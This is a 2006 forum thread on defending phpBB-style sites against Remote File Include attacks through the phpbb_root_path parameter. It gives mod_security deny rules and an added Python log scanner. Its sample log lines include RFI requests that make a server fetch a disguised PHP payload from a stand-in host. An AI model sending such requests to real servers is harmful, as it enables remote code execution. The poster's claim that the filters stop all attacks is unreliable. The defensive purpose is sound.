
Here's what the hacker is putting in the URL

PostPosted: Thu Sep 07, 2006 7:03 pm
Author: computerz
In addition to applying Michaelo's fixes, you should also install mod_security and include the filters listed below in this post. One of the filters is for phpbb_root_path. This phpbb_root_path variable is in several files located in your /includes folder which hackers are exploiting. If you add phpbb_root_path to your mod_security filters, this will stop all attacks on your server which attempt to use this exploit, as mod_security will reply with a 406 Access Denied error every time the hackers try to break into your server.

Here's an example of a hack attempt that mod_security will pick up and deny. Notice the phpbb_root_path variable in the string.


/functions.php?phpbb_root_path=http

This is a Remote File Include attack. It tells your server to upload a malicious file called pic.gif to your server's /tmp directory.

In this case pic.gif is not actually a gif file, but rather a PHP file with php commands hidden inside the file and renamed with a .gif extension.

The hacker then establishes an IRC connection to your server to access this file and execute it, which will then give him/her full access to files on your server to edit files with code that says "this site has been hacked" etc, or to just simply delete all files on your server.

To fully prevent this, simply install mod_security and include the following filter in your mod_security config file. If you don't have a dedicated server, just ask your host to install mod_security for you and tell them to copy in these lines. If they already have it installed then ask them to copy in these lines (also included are filters for other common attacks such as union and clicke).

<IfModule mod_security.c>
SecFilterEngine On
SecFilterScanPOST On
SecFilterCheckURLEncoding On
SecFilterForceByteRange 0 255
SecAuditEngine RelevantOnly
SecAuditLog logs/audit_log
SecFilterDebugLog logs/modsec_debug_log
SecFilterDebugLevel 0
SecFilterDefaultAction "deny,log,status:406"
SecFilterSelective REMOTE_ADDR "^127\.0\.0\.1$" nolog,allow
Include "/usr/local/apache/conf/modsec.user.conf"
</IfModule>

# Request filters: these belong in the modsec.user.conf file pulled in by the Include above
SecFilterSelective THE_REQUEST ".htgroup"
SecFilterSelective THE_REQUEST "phpbb_root_path"
SecFilterSelective THE_REQUEST ".htaccess"
SecFilterSelective THE_REQUEST "cd.."
SecFilterSelective THE_REQUEST "///cgi-bin"
SecFilterSelective THE_REQUEST "/cgi-bin///"
SecFilterSelective THE_REQUEST "/~root"
SecFilterSelective THE_REQUEST "/~ftp"
SecFilterSelective THE_REQUEST "/htgrep" chain
SecFilterSelective THE_REQUEST "/htgrep" log,pass
SecFilterSelective THE_REQUEST "/.history"
SecFilterSelective THE_REQUEST "/.bash_history"
SecFilterSelective THE_REQUEST "/~nobody"
SecFilterSelective THE_REQUEST "<script>"

If mod_security is installed, it will stop this kind of attack provided that you use the filters I posted above, and that you have SecFilterScanPOST set to On, i.e.

SecFilterScanPOST On

It will also stop malicious GET payloads sent directly via the URL.
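The THE_REQUEST rule set above, turned into a log-scanning check so you can see which requests in an existing Apache access log the filters would have denied. This is an added example, not code from the thread or from mod_security; the log lines, IP addresses and file names in it are constructed samples.

```python
import re
from urllib.parse import unquote

# Filter strings copied verbatim from the SecFilterSelective THE_REQUEST rules above.
# mod_security 1.x compiles them as regexes: an unescaped "." just over-matches (extra 406).
THE_REQUEST_FILTERS = [
    ".htgroup", "phpbb_root_path", ".htaccess", "cd..", "///cgi-bin", "/cgi-bin///",
    "/~root", "/~ftp", "/htgrep", "/.history", "/.bash_history", "/~nobody", "<script>",
]
COMPILED = [(f, re.compile(f)) for f in THE_REQUEST_FILTERS]
# Mirrors 'SecFilterSelective REMOTE_ADDR "^127.0.0.1$" nolog,allow' (dots escaped).
ALLOW_REMOTE_ADDR = re.compile(r"^127\.0\.0\.1$")
# Apache combined log format: ip ident user [time] "request" status size "ref" "ua"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) ')

def matching_filters(request_line):
    """Return the filter strings that fire on one THE_REQUEST value.
    mod_security 1.x URL-decodes before matching, so %5F-style evasions are decoded here too."""
    decoded = unquote(request_line)
    return [f for f, rx in COMPILED if rx.search(decoded)]

def scan_access_log(lines):
    """Return (client_ip, request, fired_filters) for every log entry the rules would deny."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, request, _status = m.groups()
        if ALLOW_REMOTE_ADDR.match(ip):   # loopback is whitelisted by the allow rule
            continue
        fired = matching_filters(request)
        if fired:
            hits.append((ip, request, fired))
    return hits

# Constructed sample log (TEST-NET addresses); not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Sep/2006:19:03:11 -0400] "GET /includes/functions.php?phpbb_root_path=http://198.51.100.9/pic.gif? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '198.51.100.77 - - [07/Sep/2006:19:04:02 -0400] "GET /viewtopic.php?t=42 HTTP/1.1" 200 8731 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [07/Sep/2006:19:05:40 -0400] "GET /admin/.htaccess HTTP/1.1" 403 221 "-" "curl/7.15"',
    '198.51.100.23 - - [07/Sep/2006:19:06:15 -0400] "GET /includes/functions.php?phpbb%5Froot%5Fpath=http://198.51.100.9/pic.gif? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    # A POST carries its payload in the body, which the access log never records:
    # only SecFilterScanPOST On (not log review) can catch that variant.
    '203.0.113.5 - - [07/Sep/2006:19:07:01 -0400] "POST /includes/functions_mod_user.php HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
]

if __name__ == "__main__":
    for ip, request, fired in scan_access_log(SAMPLE_LOG):
        print(f"{ip} would get 406: {request!r} matched {fired}")
```

Running it flags the two phpbb_root_path requests (plain and URL-encoded), skips the loopback client, and stays silent on the POST, which is exactly the gap SecFilterScanPOST closes.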

PostPosted: Fri Sep 08, 2006 12:11 am
Author: Michaelo
This file (functions_mod_user) was part of an old mod and is still used by some, but we don't have it.

PostPosted: Fri Sep 08, 2006 8:22 am
Author: computerz
Sorry guys... if you already copied the above rule set, change it. I've updated the ruleset as I left out POST payload scanning [see first post of this thread].

PostPosted: Fri Sep 08, 2006 8:47 am
Author: computerz
You will also have to reboot your server after applying the modsecurity.conf changes. It works like a charm. You will have no more rudimentary hacker problems for a very long time after installing mod_security with the above rule set I provided, which filters out incoming malicious POST and GET payloads from your server, well before they hit the IntegraMOD scripts.

PostPosted: Fri Sep 08, 2006 10:17 pm
Author: Michaelo
Just stop and restart Apache... no need to reboot :D